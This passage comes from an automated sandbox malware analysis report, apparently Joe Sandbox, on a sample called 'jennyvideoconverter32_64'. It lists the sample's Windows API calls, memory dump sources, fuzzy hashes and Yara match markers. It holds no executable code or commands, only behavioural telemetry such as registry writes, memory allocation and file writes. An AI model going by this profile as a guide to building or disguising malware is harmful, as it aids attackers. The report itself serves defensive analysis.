                                                                                • WriteFile.KERNELBASE(79E8203A), ref: 02DF7B95
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2dba000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 0ce4c7f90b7b3b8e5597eefd4ad77aa7476d04211c1c985ebeafa6aaffbc8b5c
                                                                                • Instruction ID: 2cd82635fecbaf99f129c4b59b225afd0d1ac011a42da678b1e2ccabb6a7a23a
                                                                                • Opcode Fuzzy Hash: 0ce4c7f90b7b3b8e5597eefd4ad77aa7476d04211c1c985ebeafa6aaffbc8b5c
                                                                                • Instruction Fuzzy Hash: C81114B260C7049BE3157F09D8857BAFBE4EF54720F02492DD7C947740E635A8548B9B
                                                                                Function 02D833B2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D833CC
                                                                                  • Part of subcall function 02D832AB: __EH_prolog.LIBCMT ref: 02D832B0
                                                                                  • Part of subcall function 02D832AB: RtlEnterCriticalSection.NTDLL(?), ref: 02D832C3
                                                                                  • Part of subcall function 02D832AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D832EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                • String ID:
                                                                                • API String ID: 1518410164-0
                                                                                • Opcode ID: a1d3c2145e30022230e2670bc23fc21a840eb7d0226992f8c685bb1125ddd0e9
                                                                                • Instruction ID: 104907299b4974926bdf16b9e8996ba35b55e43488be30a2e03a80c289b4b8d4
                                                                                • Opcode Fuzzy Hash: a1d3c2145e30022230e2670bc23fc21a840eb7d0226992f8c685bb1125ddd0e9
                                                                                • Instruction Fuzzy Hash: 50018070214606AFD704EF59D885F55BBA9FF44720F10835AE828873C0EB71EC21CBA4
                                                                                Function 02D8DBC4 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 02D8D2F7: __EH_prolog.LIBCMT ref: 02D8D2FC
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D8DBE1
                                                                                  • Part of subcall function 02D9449A: RaiseException.KERNEL32(?,?,02D8FA92,?,?,?,?,?,?,?,02D8FA92,?,02DB0F78,?), ref: 02D944EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionException@8H_prologRaiseThrow
                                                                                • String ID:
                                                                                • API String ID: 1681477883-0
                                                                                • Opcode ID: d8af6f4dca250fc28a1a0bfb4773cb6e1bff9b9b43b4a1337e30d46bac16d633
                                                                                • Instruction ID: f400849eeb2d909f24a3c8a620a6c59b78b2f8afec99349d0c6207a4a8c9c4b2
                                                                                • Opcode Fuzzy Hash: d8af6f4dca250fc28a1a0bfb4773cb6e1bff9b9b43b4a1337e30d46bac16d633
                                                                                • Instruction Fuzzy Hash: 7CF04F71910209ABD718ABA9D849DAB73FDDB08714F40055DF60A93640EAA1F8158BB1
                                                                                Function 02D8E484 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8E489
                                                                                  • Part of subcall function 02D826DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D82706
                                                                                  • Part of subcall function 02D826DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D8272B
                                                                                  • Part of subcall function 02D826DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DA5A93), ref: 02D82738
                                                                                  • Part of subcall function 02D826DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D82778
                                                                                  • Part of subcall function 02D826DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D827D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                • String ID:
                                                                                • API String ID: 4293676635-0
                                                                                • Opcode ID: acd5bbd5d2fff9ad84add6282ca517acfb0f097bc39fdaafcf7869a5e5c606ae
                                                                                • Instruction ID: eea50c5a0df8e7aed3faa2cd10c1a85d39cf6b716cb0e4879f708607eb1e488d
                                                                                • Opcode Fuzzy Hash: acd5bbd5d2fff9ad84add6282ca517acfb0f097bc39fdaafcf7869a5e5c606ae
                                                                                • Instruction Fuzzy Hash: A001DCB0910B148FC718CF1AC154986FBF5EF88310B05C5AE944A8B721E3B1EA40CFA0
                                                                                Function 02D8E263 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8E268
                                                                                  • Part of subcall function 02D93A8F: _malloc.LIBCMT ref: 02D93AA7
                                                                                  • Part of subcall function 02D8E484: __EH_prolog.LIBCMT ref: 02D8E489
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$_malloc
                                                                                • String ID:
                                                                                • API String ID: 4254904621-0
                                                                                • Opcode ID: cdd2772d9dca7587b33602f0e9c16dc8655045bfe0d7ed1f4d23e7b3128fb9b6
                                                                                • Instruction ID: 75a92c78830a9bd84359b23a9a613bd57a10149dae093aa604a535b62d9c34c1
                                                                                • Opcode Fuzzy Hash: cdd2772d9dca7587b33602f0e9c16dc8655045bfe0d7ed1f4d23e7b3128fb9b6
                                                                                • Instruction Fuzzy Hash: B6E01271A15115ABDF5DEFA9E811B7D77A6EB44300F0086ADB809D6740DB70DD008E65
                                                                                Function 02D93395 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 02D95B9A: __getptd_noexit.LIBCMT ref: 02D95B9B
                                                                                  • Part of subcall function 02D95B9A: __amsg_exit.LIBCMT ref: 02D95BA8
                                                                                  • Part of subcall function 02D933D6: __getptd_noexit.LIBCMT ref: 02D933DA
                                                                                  • Part of subcall function 02D933D6: __freeptd.LIBCMT ref: 02D933F4
                                                                                  • Part of subcall function 02D933D6: RtlExitUserThread.NTDLL(?,00000000,?,02D933B6,00000000), ref: 02D933FD
                                                                                • __XcptFilter.LIBCMT ref: 02D933C2
                                                                                  • Part of subcall function 02D98CD4: __getptd_noexit.LIBCMT ref: 02D98CD8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                • String ID:
                                                                                • API String ID: 1405322794-0
                                                                                • Opcode ID: 62430052743222c1b5183760751d2cd9468cbae44347fc31151cd4958ea7f39b
                                                                                • Instruction ID: d708eb001f04afcaf629fd40972b027859264f46c3cbf768aa146d0ef523b25c
                                                                                • Opcode Fuzzy Hash: 62430052743222c1b5183760751d2cd9468cbae44347fc31151cd4958ea7f39b
                                                                                • Instruction Fuzzy Hash: 88E0B6B5945604AFEB08ABA0D915F6E7766EF45706F200188F1029B361DA759D40AE30
                                                                                Function 02DE31AF Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(168B68CD), ref: 02DED270
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002DBA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DBA000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2dba000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 7c7a61f9f284e03bda672f2fa3dc2ba8de4ab054bff9a7b146fe7ad3ed443882
                                                                                • Instruction ID: a05fb5b362fdcbaec1b307395711fd071b2bbc50f7fc16a623156b4326397a8c
                                                                                • Opcode Fuzzy Hash: 7c7a61f9f284e03bda672f2fa3dc2ba8de4ab054bff9a7b146fe7ad3ed443882
                                                                                • Instruction Fuzzy Hash: 1BD06CF058CA08CBD7557F49DC8567DFBE8AF41301F12485C82E686750EA748888CB9A
                                                                                Function 0040226B Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: ManagerOpen
                                                                                • String ID:
                                                                                • API String ID: 1889721586-0
                                                                                • Opcode ID: 8264c35b346934b1a34de84308aa6ba0c3dc43f738d8b3d182250907c2d0be6e
                                                                                • Instruction ID: cf44c9507d41d844d4e08f7d14fcdcefca16c4e82706d54fd6ba5a2fce2703a3
                                                                                • Opcode Fuzzy Hash: 8264c35b346934b1a34de84308aa6ba0c3dc43f738d8b3d182250907c2d0be6e
                                                                                • Instruction Fuzzy Hash: E2C012B004C302EAC2A08A200FE883A219CC124384B708837A207B91D6D37D091BB9BF
                                                                                Function 00402224 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExA.KERNELBASE(?,00000000), ref: 0040B8EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 11852e692feb5fc0fe2d537e4d4718d73ee6626a7552695eefc9478bb5382bb0
                                                                                • Instruction ID: ca2f13da04a3db2b3b4b96cdd5c8feaaa244f5f3b1ba8505971a5640bbb5702b
                                                                                • Opcode Fuzzy Hash: 11852e692feb5fc0fe2d537e4d4718d73ee6626a7552695eefc9478bb5382bb0
                                                                                • Instruction Fuzzy Hash: 50D02230200212DBCB005BB4CD68B6436B0FF427A0F008636FC12FC4D0C3B180027A0A
                                                                                Function 0040B0CA Relevance: 1.5, APIs: 1, Instructions: 9registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: 23fe80eec49aeeb1678493c446eb42f43d3f12bada28fb0827316aa0324d5972
                                                                                • Instruction ID: 1c57bc09d8bf22a48340e4eb788f302c9c1bfc31f98e5d519a64d6cb0c2937c0
                                                                                • Opcode Fuzzy Hash: 23fe80eec49aeeb1678493c446eb42f43d3f12bada28fb0827316aa0324d5972
                                                                                • Instruction Fuzzy Hash: C6C00270504106EAD7448A928E5866D66A46708345F20457B8803B11C5D3B9C155592E
                                                                                Function 0040B8AA Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(00409F90), ref: 0040B9B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: LocalTime
                                                                                • String ID:
                                                                                • API String ID: 481472006-0
                                                                                • Opcode ID: ebd2a821f356bc171f27cbc6d7b5de8ef6eae71528622997e5226e3dbc7ec01b
                                                                                • Instruction ID: a7f967e1ebb2f7ebd95cfc360c7a78c232a595a08d73ceb3f1a41a67e7c67032
                                                                                • Opcode Fuzzy Hash: ebd2a821f356bc171f27cbc6d7b5de8ef6eae71528622997e5226e3dbc7ec01b
                                                                                • Instruction Fuzzy Hash: 4BC08CB1808402EECB00AB62894602932E4DA58386321803BC003F30A0D73C8402DF9F
                                                                                Function 004022A2 Relevance: 1.5, APIs: 1, Instructions: 8fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CopyFile
                                                                                • String ID:
                                                                                • API String ID: 1304948518-0
                                                                                • Opcode ID: 9941e5161190b93204a8f50b1f4f5bc0fef5feafe68d5a0c3e5b2582f36667c7
                                                                                • Instruction ID: 92994eed6788655cd6e8b5697041bbc974fe699f59b47debdc455bcc225c985b
                                                                                • Opcode Fuzzy Hash: 9941e5161190b93204a8f50b1f4f5bc0fef5feafe68d5a0c3e5b2582f36667c7
                                                                                • Instruction Fuzzy Hash: AEB01294148012FED1000E155EC8F37221CD8483D532504723003F00C0D37C444275BF
                                                                                Function 00402231 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDirectoryA.KERNELBASE ref: 004025F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectory
                                                                                • String ID:
                                                                                • API String ID: 4241100979-0
                                                                                • Opcode ID: dd21338a10475b92d35c91b6d7a1eb9cdff4975aba9547ccf27c8b6d8e9fca1c
                                                                                • Instruction ID: 6c2bb403a29e9a4daca0c7564591e9dc5a5c57b0ea50bd6513e4dc3229f0b2d4
                                                                                • Opcode Fuzzy Hash: dd21338a10475b92d35c91b6d7a1eb9cdff4975aba9547ccf27c8b6d8e9fca1c
                                                                                • Instruction Fuzzy Hash: 04B0926448A120E3C00112501E18D6A6818A81974172040B33203700D042B9004232AF
                                                                                Function 0040278D Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegSetValueExA.KERNELBASE(?), ref: 0040BAD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID:
                                                                                • API String ID: 3702945584-0
                                                                                • Opcode ID: f0798ced970cd0eee09a48c3301d522f9189595879b829ecdb2c50a8d54bb03d
                                                                                • Instruction ID: dcbd4d72fe35a2031074dc5c123e8ed0107a6bbbcb0a95934b4016e8c6f2847c
                                                                                • Opcode Fuzzy Hash: f0798ced970cd0eee09a48c3301d522f9189595879b829ecdb2c50a8d54bb03d
                                                                                • Instruction Fuzzy Hash: 69B09270448004FACB050B808C04A7C7E39EB08308F2008A6E003704A0C33A1662BAAF
                                                                                Function 00402785 Relevance: 1.5, APIs: 1, Instructions: 5registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCloseKey.KERNELBASE(?), ref: 0040BAB8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 74fdc1d825e6b9643e33f7b1b15225b0ab1e21605966e4fe9622bb3e7052b3ff
                                                                                • Instruction ID: e7ce10565d94f2d6b5d79441531ae5dedac754878596eced195b0ecab70b45c4
                                                                                • Opcode Fuzzy Hash: 74fdc1d825e6b9643e33f7b1b15225b0ab1e21605966e4fe9622bb3e7052b3ff
                                                                                • Instruction Fuzzy Hash: 41B01230D48000D6C60007848E04C5D3E70EE043003204073A323300D0833E60126B4F
                                                                                Function 0040B67C Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: 53827522284af458aa1ab5c18d52477b93fa4c5ed2fdaecd456359178508f89c
                                                                                • Instruction ID: 7835f287b7ac2ec363220ad89fda173408b54a468dd99bcfa8236ab55ce49fe7
                                                                                • Opcode Fuzzy Hash: 53827522284af458aa1ab5c18d52477b93fa4c5ed2fdaecd456359178508f89c
                                                                                • Instruction Fuzzy Hash: 3EA00231848001EBC6054B60EF084143EB1E7093013114131E30B705B6C7756575AB4E
                                                                                Function 00402772 Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryValueExA.KERNELBASE ref: 00402772
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID:
                                                                                • API String ID: 3660427363-0
                                                                                • Opcode ID: dd30d86c2cb366e9c13c8ea6a3dceef0d370df1b95f0ba6f3b87dfe9bf79d56a
                                                                                • Instruction ID: db611a556c80a4156a95494c6baac6c809ed63d2f65f8c354959cc7a17010b18
                                                                                • Opcode Fuzzy Hash: dd30d86c2cb366e9c13c8ea6a3dceef0d370df1b95f0ba6f3b87dfe9bf79d56a
                                                                                • Instruction Fuzzy Hash: CB900220254501AED2108E315E1C3152594654464132288355857E5091EA748051692D
                                                                                Function 02D920A0 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 02D91550: OpenEventA.KERNEL32(00100002,00000000,00000000,9D194A3F), ref: 02D915F0
                                                                                  • Part of subcall function 02D91550: CloseHandle.KERNEL32(00000000), ref: 02D91605
                                                                                  • Part of subcall function 02D91550: ResetEvent.KERNEL32(00000000,9D194A3F), ref: 02D9160F
                                                                                  • Part of subcall function 02D91550: CloseHandle.KERNEL32(00000000,9D194A3F), ref: 02D91644
                                                                                • TlsSetValue.KERNEL32(0000002A,?), ref: 02D920EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandle$OpenResetValue
                                                                                • String ID:
                                                                                • API String ID: 1556185888-0
                                                                                • Opcode ID: 2435b6005c13e19213664412d36f6caa81868bc21e981a68e39adfe54300c6c5
                                                                                • Instruction ID: 406ae2250f693a0d34a1cc52004a36f9961917d866632477e618aeb078ce457b
                                                                                • Opcode Fuzzy Hash: 2435b6005c13e19213664412d36f6caa81868bc21e981a68e39adfe54300c6c5
                                                                                • Instruction Fuzzy Hash: E2014F71A44208EBDB10CF59DC45F5ABBB8EB05661F20476AF82AD3380D771AD148AA4
                                                                                Function 0040B578 Relevance: 1.3, APIs: 1, Instructions: 15stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 1586166983-0
                                                                                • Opcode ID: 9259034f9c6d289e9ec8bcef7263c519d4f903fecd28d6a2e207d7c1771b5900
                                                                                • Instruction ID: b5f8f263d16769cb31651ae56cb00abbdace1765039e4227436d59fb96a91dfd
                                                                                • Opcode Fuzzy Hash: 9259034f9c6d289e9ec8bcef7263c519d4f903fecd28d6a2e207d7c1771b5900
                                                                                • Instruction Fuzzy Hash: 91D0C770509105EBD714DF61CE5857A3678D9043407718873D813F11D1D37D9A1269AF
                                                                                Function 00402294 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000), ref: 0040BA39
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 8cf77ba56312f54d1de7b4e86e86cbe2d3fc3d75dfff5ed5d6e23ae7d353bf3e
                                                                                • Instruction ID: 8baab39f79222ad69af9f7c184d24bad087c08ac3741b2477b829d7ccf767dca
                                                                                • Opcode Fuzzy Hash: 8cf77ba56312f54d1de7b4e86e86cbe2d3fc3d75dfff5ed5d6e23ae7d353bf3e
                                                                                • Instruction Fuzzy Hash: B4C09B75544211DFD7014F944D057797A64FB08700F150032B607B51D0C3B40459DBDA
                                                                                Function 0040B201 Relevance: 1.3, APIs: 1, Instructions: 5sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 7fb4213547574f66c02ff0f43809cfe0ee43891f6a3f8159c78aa0a70bd72f64
                                                                                • Instruction ID: 1c164ee476cb8379e7514de9a49bea1d2529bdc8e948ab7d787de939f3fa2199
                                                                                • Opcode Fuzzy Hash: 7fb4213547574f66c02ff0f43809cfe0ee43891f6a3f8159c78aa0a70bd72f64
                                                                                • Instruction Fuzzy Hash: 1FB01270084501F7C70017105D0CB207B30F300305F128022A303300D083390022A78E
                                                                                Function 004022AF Relevance: 1.3, APIs: 1, Instructions: 5sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 560f6e5b77014ce9311d8275f1ebcf9d822d17cd6fca2ff53e7c27d995d99283
                                                                                • Instruction ID: a4846ccc1d67bb746d88fd63910e671ade73014cd24cf15cf678f30609dd6dec
                                                                                • Opcode Fuzzy Hash: 560f6e5b77014ce9311d8275f1ebcf9d822d17cd6fca2ff53e7c27d995d99283
                                                                                • Instruction Fuzzy Hash: 30B001B1988500EAD6054B60AE09F343A31F305719F254636A70B746E1CB7B18A6AA8F

                                                                                Non-executed Functions

                                                                                Function 02D908B8 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D908E2
                                                                                • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D908EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                                • Instruction ID: d509b81af89b75d99dab8492d95cb8d84cb280962d7c85ca1040875709d2f9c6
                                                                                • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                                • Instruction Fuzzy Hash: D9F09A30308301DFEB24CE25C851B2EBBE4AB9C745F54092CF596A2291D370E581CB6A
                                                                                Function 02D99468 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02D94DD6,?,?,?,00000001), ref: 02D9946D
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02D99476
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
